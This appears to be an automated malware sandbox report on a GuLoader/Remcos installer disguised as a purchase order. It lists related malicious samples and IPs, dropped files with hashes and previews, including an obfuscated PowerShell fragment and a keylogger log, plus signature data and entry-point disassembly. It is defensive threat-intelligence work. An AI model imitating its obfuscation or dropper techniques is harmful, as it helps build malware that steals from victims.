                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUShttps://www.jobserve.com/gb/en/Redirect/DirectoryUrl.jsrs?id=D678A952F7&L=https://freshpastacup.com/ximxi/MD5/BASE64EMAILGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.21.17.5
                                                      JJXXAhUWC.ps1Get hashmaliciousUnknownBrowse
                                                      • 104.19.177.52
                                                      Remittance Confirmation 5-2-2024.htmGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      Advice Ref A231k6Q1L2GQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      ls3wzs2VQr.rtfGet hashmaliciousUnknownBrowse
                                                      • 104.21.84.67
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.51.78
                                                      PO 2_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      • 104.26.12.205
                                                      SC-246214.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 172.67.206.230
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.95.19
                                                      SWISSCOMSwisscomSwitzerlandLtdCHEvgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      cvoBQP1Lxo.elfGet hashmaliciousMiraiBrowse
                                                      • 170.17.254.60
                                                      cqf3hb5Qxg.elfGet hashmaliciousMiraiBrowse
                                                      • 146.4.138.28
                                                      957URl9ErB.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 193.222.96.219
                                                      .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 193.222.96.21
                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 164.204.161.205
                                                      ATOM86-ASATOM86NLREVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 178.237.33.50
                                                      INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      GVV.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 178.237.33.50
                                                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19er).xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      SAL_000268_DOM.xlsGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 104.21.45.139
                                                      5801.xlsGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 104.21.45.139
                                                      325445263.imgGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      Fact.NaturgyID300S220404024NOPA22442452256676545245PDR2PD04LF.msiGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      Purchase Order05022024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.45.139
                                                      Notice.xlsGet hashmaliciousUnknownBrowse
                                                      • 104.21.45.139
                                                      JlvRdFpwOD.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                      • 104.21.45.139
                                                      No context
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):965
                                                      Entropy (8bit):5.023840386167536
                                                      Encrypted:false
                                                      SSDEEP:12:tkhXkmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qhXldRNuKyGX85jvXhNlT3/7AcV9Wro
                                                      MD5:35B07141970464FE1515126EE76D86C8
                                                      SHA1:BF560D7B92845B6DE04C7716CE1B62E4637E62E5
                                                      SHA-256:B2A7CD5C3E618A0ADFAA1B65E49A88B29060CA7C165DB516C5B32D376A12D4E0
                                                      SHA-512:D79DA10444FA33DDD7CE1DC12649D16E3E50C8E7E956487A62D9BAFC887F0C1B6B3761AE0E01ED5F72D86E078AD3897DC97A99F625E8FECA60F683D720C9BCD0
                                                      Malicious:false
                                                      Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.838950934453595
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):933287
                                                      Entropy (8bit):4.023153312007139
                                                      Encrypted:false
                                                      SSDEEP:6144:tvFQ7NN+jhgPdXJ1gSQ4TWTes7+sPiC4sBT+HwZH6SGMAcTET2Wv2TF9:FF02hGxJ1g5ThzXl9NGMAoET2CEF9
                                                      MD5:F19A031D82122F3EA7EE4221061D7E9B
                                                      SHA1:723C8D12308AF7C7A871C82F54882B2A84D3D300
                                                      SHA-256:18E1A0548E9B27CD8D6B16CB89F93FB0206EAC3C4F5AC8B5C481F8F372AEA9CB
                                                      SHA-512:11E4DA50F090FE01A3FF0697C068C01F6CB9D60B35DBC315C91A414A1CEAABD143C88C23352CC6E35BAA3086D47CAA0A31F1C9D2778A758BB975440C2BB7475B
                                                      Malicious:false
                                                      Preview:^'......,...................m............&......F'..........................................................................................................................................................................................................................................G...[...........Y...j...............................................................................................................................................5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:ASCII text, with very long lines (57553), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57553
                                                      Entropy (8bit):5.3247790783781355
                                                      Encrypted:false
                                                      SSDEEP:768:m0xiUN/THk8c1Sj0n4pWSEQjVtcNd0cNdKFVJhYRsex2bxkqsIzzMqA+CA49:WUN/THkT1SvpWvQhtcv+FVH3D/PA/B9
                                                      MD5:DE3E908D8A9B4EFD29F77F55D5305C5B
                                                      SHA1:054248535582DDD0D7BB25C5C4757A9166763A15
                                                      SHA-256:A60D0460A7535D710C8083D2801309C85E4C4799657A555D8B50EB413F9BF485
                                                      SHA-512:E6A56F4FD7E9EF71BC874DF03D822F349470AC4E13A8ACFB16B2134E83579C7250CF8CB323EC17C9CB288601E51B9C615A57CBB403B85A3B35FF1EF3F6DAE001
                                                      Malicious:true
                                                      Preview:$Totlafholdenhed=$Differentialforstrker;<#Volapuker Mundheldene Overattachment Exhbn Sparrers Reinvolves #><#Hdersbevisningen creatin Everyness #><#Trolddomskrafts Injuranten Befordringsregler Reexposure Subreptary Worrisomely #><#Remeasuring Feterings afspaltningen Parritch Helbredelsesmetoders #><#Skrmtroldes Aksers Globals Bruttolnnens #><#Righteously Unbrutalises Amathophobia Formaler frisrsalonerne Bugswtr Rimens #><#Kampisternes Marshal Intervalhalverings #><#Tartralic Inoxidability epichorion #><#Unvolitioned metaphosphate Termobeholdere #><#Conchfish Lettedes Neuter #><#Amatrers Slvsmedjerne Coconsciously Kreditomkostning Apohyal Mundfuldene Podzolize #><#Linielngder Farmage Slvringens forbrndtes Unredeemably #><#Syvtiden Lecherousness Peptoniser Cushitic Tremmekalvens #><#Opdigtet Kassia Vellicated Dearnesses Materialhandel #><#Helicorubin Mikadoernes Faconstenens Sonnet Titikas Cumacean #><#Desertr Semiautomatic Indendrsarkitekternes #><#Burgee Interrogate Epilepsies Extravas
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):317991
                                                      Entropy (8bit):7.705189106761701
                                                      Encrypted:false
                                                      SSDEEP:6144:NvFQ7NN+jhgPdXJ1gSQ4TWTes7+sPiC4sBT+HwZH6SGMA9:lF02hGxJ1g5ThzXl9NGMA9
                                                      MD5:9BF43E283243F08A00430F29F3812BA0
                                                      SHA1:A07E6AAD2B1C183F669B4910C37A9FC0C0F1944A
                                                      SHA-256:5E601FBB39916B9CD2FBAAF0E3AA009D30850259559A485C79A87A2CA0F75E31
                                                      SHA-512:38622D0D22EFB48BF2DAE77DF1D1C317E1BBA7C5271191F3E491D3A701D997BDB3A77A60455C4C16B549BA909BA98130F5A3F9B843E14DACC1E209C6193D2C59
                                                      Malicious:false
                                                      Preview:...oo............J....................+.......H......ss...................0.........................Y.:.gg.............................].d..__.............~~.....E...^.......................%%...RRR......^^^^.{..........q.....^....R......0.....................}}}}}}}}.......ccc......./.............fff....g..e......ZZ.............l.__.tttt.i./............................VVV....N.....G..XXX.FF......i............+....r...............{..xx.........!.............:.........%..W.....P............................|||.....===.................(.......`...............................j..............h..........................gg......y........S.......000........4..$$$.........///..{{{{..............O................:.....BBBB.::.......vvv.......6.000........55............./....CCCC............Q.........................k......hh..##...............................:....0.....i.......................@..............////....pppp.1...?................-...........1..................~........MMM.........f...
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):501264
                                                      Entropy (8bit):7.514189430324988
                                                      Encrypted:false
                                                      SSDEEP:12288:pnPdsC9RjSmHcRhoKm3H4yfDBobpx2LzY9dW8FNOgM:1PdZWmHECHpBEpILzY9dW8+gM
                                                      MD5:CBFE477536E5434005EC40A22C8B79EE
                                                      SHA1:2FB42B99BB51041BBBE2DA96125AEB95EC1B4C02
                                                      SHA-256:88079D533879C31B99A435C152016333280E0290B80F8F3AFBB28F2CCBC4B246
                                                      SHA-512:BEEA18BC954059A6418DD4B7548350DCF95D4D3EB14B9DC7FA32B11D3E558BCE57BE765CDDBF99DE32CEAD9F3F4A37F57558C031337DB49E000D0FAE1B214365
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                      • Antivirus: Virustotal, Detection: 11%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@................................. ;....@.........................................................p................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...@...............................rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:ASCII text, with very long lines (306), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):477
                                                      Entropy (8bit):4.2758031658111015
                                                      Encrypted:false
                                                      SSDEEP:12:/Sk0C6TMP4eCAEzbDll7gFV0peuMUkWOKKgzRxRkhrfEiMvct:/S5TMPzDEzbplEFV0peuMZJszRYu0t
                                                      MD5:292E116B3003FAD8B824FF54B5222693
                                                      SHA1:D3BE81A8A5404BE699A6A59B316D0E239F60F305
                                                      SHA-256:A7AE5BDF2822C1941C09A9D3535F5B04934D914C16FED87BE1369EC3190ADAF7
                                                      SHA-512:7DC7D2CEE6F5EE002C0049E45E5D58E02DA99AF40CCA7D81FC97853FA463404C6FA6425480DFA954E951B29353D69F81577237D94ECB24D9E06E8287223C9FD2
                                                      Malicious:false
                                                      Preview:sakramentet monicker organisten edderdunsdyne unnipped bolsmnds dysfunctional parrotism..camelopardalis overbeskftigelsen indvirkningerne mooley tornystrenes bovlstrup..brinkmanship stenbroernes efteruddanelseskurser,matmaking fibroadenia sharezer gaseosity vaporiferous falks.underskriftindsmlings skovmaars absurd simulering cerebrotonic harmonisations dmpnings.dioptometre dowser annullwlr overgirded triplicity rosenbedet glorificeredes glsningerne lombrosian mttere waag..
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):276710
                                                      Entropy (8bit):0.15969803423381917
                                                      Encrypted:false
                                                      SSDEEP:96:Y8nH0PyxSEySqWNnJryMrPle1okR1pVK+W7t49hTc:Y8H0KxrqWxNPle1nR7VKB7t49hY
                                                      MD5:B85779B542E03E21F26DB4C58587204F
                                                      SHA1:BB0BD37AEEC3339DBD8A1BBE8E879549C84E29A0
                                                      SHA-256:BB1827D75495F93A729C94844AD2E17E9E211AEBEE5B6BB8574314C455BA95E6
                                                      SHA-512:9F894F912B040282554A2F8A67CFDDEC7D9AC30739BF4E04E2EE18D440F3287CFBEF45E7B8E7D3F95D846330B457CE5C1FFAB423CB7E30F014EAD29252434FEA
                                                      Malicious:false
                                                      Preview:......................................................................2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.000122
                                                      Category:dropped
                                                      Size (bytes):100609
                                                      Entropy (8bit):0.15377383202349873
                                                      Encrypted:false
                                                      SSDEEP:48:WNo92FmrnJoUPwwYJ+LW//XVWZJNBD9dGG0E:WNe5oUPwwi+LW/wZJNBBoE
                                                      MD5:C3F66924A836D18C62CD39BCA76A4686
                                                      SHA1:35F86E33B8EFA49B17C0EE1E11A82829D93662DD
                                                      SHA-256:A99DEBA735D90BA79B85356E47CFCBCBD959BDEA538EBD9126715730EAEFE08A
                                                      SHA-512:EF16C0BEB61ECA149BD37AC5D7560CE6D1471849304DA2A25EF3B38C69656AB2F3FA2425A5CB82C1AD2B06F90521EE31843A1D4E0E49E9BE6D41B7F8D8970A9E
                                                      Malicious:false
                                                      Preview:...........................................................................................................................................................................................9................................................................................................................................................................................................................................................................................................................A........................................................................................................................................7..............................................................h......u....................................................................................................................................................................Y.......................................................................................................................................
                                                      Process:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):169841
                                                      Entropy (8bit):0.16017172270085472
                                                      Encrypted:false
                                                      SSDEEP:96:38f7y3AcZmvLQEZVVMeAlqKNV2Zp3yHstq:o7y3AcZmsEZVVMeAlqRp3y+q
                                                      MD5:8AFCC792B0E9516C3B43CCEBEE7EACC1
                                                      SHA1:8C4DDCEA5941F087B85B535FF08AE9ECFFD7607E
                                                      SHA-256:944F29A96DF1077575C114A18F04CF233FD2E6E82BB083A6D7D85CDAF5C7E613
                                                      SHA-512:3FFB0508E68FB675C758E55160FA957EE234A4FC85515C376317FF2641D408433AC295EB628F7155801B1EAF50F4B04A24A3DE14C1C2A43A2BE506A5500A4EA7
                                                      Malicious:false
                                                      Preview:................................................................@...............................x..............................................................................................................................................X...........................................................................................................................A....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%.......................................................................................................................................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):234
                                                      Entropy (8bit):3.3499572149302352
                                                      Encrypted:false
                                                      SSDEEP:3:rhlKlFlNlNEfwb5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:6lNc4b5YcIeeDAlS1gWAAe5q1gWAv
                                                      MD5:66C1C6E5B10666A662B0D7AC4853EDAD
                                                      SHA1:8CA99DB17529B32DA54CFE32B99A2E8DAC824D6B
                                                      SHA-256:B74BA832CAD4B883F68AC18AF3904823A8C62D7D7095FA1C4593DA7F4908CC7B
                                                      SHA-512:2DE4FC88F2D36E527CD16044E003E0C851DD3E4786AD12346600D01B268B3E52C97CFBC9154F9A4C3F886ABCB4365FC50331727636A2DFD3BDA00EC3DA569207
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\fvberms.dat, Author: Joe Security
                                                      Preview:....[.2.0.2.4./.0.5./.0.2. .1.9.:.0.1.:.5.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.514189430324988
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:PO-USC-22USC-KonchoCo.exe
                                                      File size:501'264 bytes
                                                      MD5:cbfe477536e5434005ec40a22c8b79ee
                                                      SHA1:2fb42b99bb51041bbbe2da96125aeb95ec1b4c02
                                                      SHA256:88079d533879c31b99a435c152016333280e0290b80f8f3afbb28f2ccbc4b246
                                                      SHA512:beea18bc954059a6418dd4b7548350dcf95d4d3eb14b9dc7fa32b11d3e558bce57be765cddbf99de32cead9f3f4a37f57558c031337db49e000d0fae1b214365
                                                      SSDEEP:12288:pnPdsC9RjSmHcRhoKm3H4yfDBobpx2LzY9dW8FNOgM:1PdZWmHECHpBEpILzY9dW8+gM
                                                      TLSH:82B42306ABA4C426EC531534C9A9CCFB4A76AD28CB4C46075B20FFAF7D732560A1E357
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                      Icon Hash:2951ea4c6d0f968e
                                                      Entrypoint:0x403645
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                      Signature Valid:false
                                                      Signature Issuer:E=Bitters@Totalfredes.Buk, O=Transcription, OU="unfellied Iceboats ", CN=Transcription, L=Tilloy-lez-Marchiennes, S=Hauts-de-France, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 13/03/2024 07:01:13 13/03/2027 07:01:13
                                                      Subject Chain
                                                      • E=Bitters@Totalfredes.Buk, O=Transcription, OU="unfellied Iceboats ", CN=Transcription, L=Tilloy-lez-Marchiennes, S=Hauts-de-France, C=FR
                                                      Version:3
                                                      Thumbprint MD5:1C36729D4FECA7597E6CF4C05574ACDF
                                                      Thumbprint SHA-1:13C1FB7527A282EC623A8D2DF2E0F9647FCBA97D
                                                      Thumbprint SHA-256:11C2ABA375A2240CAD6D442F09511DBF58C250D586B3A3B655455FA5BDED698C
                                                      Serial:777ACF2875711BE4012CA88C2467AD7E32B70A90
                                                      Instruction
                                                      sub esp, 000003F8h
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      pop edi
                                                      xor ebp, ebp
                                                      push 00008001h
                                                      mov dword ptr [esp+20h], ebp
                                                      mov dword ptr [esp+18h], 0040A230h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [004080A0h]
                                                      mov esi, dword ptr [004080A4h]
                                                      lea eax, dword ptr [esp+34h]
                                                      push eax
                                                      mov dword ptr [esp+4Ch], ebp
                                                      mov dword ptr [esp+0000014Ch], ebp
                                                      mov dword ptr [esp+00000150h], ebp
                                                      mov dword ptr [esp+38h], 0000011Ch
                                                      call esi
                                                      test eax, eax
                                                      jne 00007F685CFFD8CAh
                                                      lea eax, dword ptr [esp+34h]
                                                      mov dword ptr [esp+34h], 00000114h
                                                      push eax
                                                      call esi
                                                      mov ax, word ptr [esp+48h]
                                                      mov ecx, dword ptr [esp+62h]
                                                      sub ax, 00000053h
                                                      add ecx, FFFFFFD0h
                                                      neg ax
                                                      sbb eax, eax
                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                      not eax
                                                      and eax, ecx
                                                      mov word ptr [esp+00000148h], ax
                                                      cmp dword ptr [esp+38h], 0Ah
                                                      jnc 00007F685CFFD898h
                                                      and word ptr [esp+42h], 0000h
                                                      mov eax, dword ptr [esp+40h]
                                                      movzx ecx, byte ptr [esp+3Ch]
                                                      mov dword ptr [00429B18h], eax
                                                      xor eax, eax
                                                      mov ah, byte ptr [esp+38h]
                                                      movzx eax, ax
                                                      or eax, ecx
                                                      xor ecx, ecx
                                                      mov ch, byte ptr [esp+00000148h]
                                                      movzx ecx, cx
                                                      shl eax, 10h
                                                      or eax, ecx
                                                      movzx ecx, byte ptr [esp+0000004Eh]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x21fc0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x78d700x18a0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
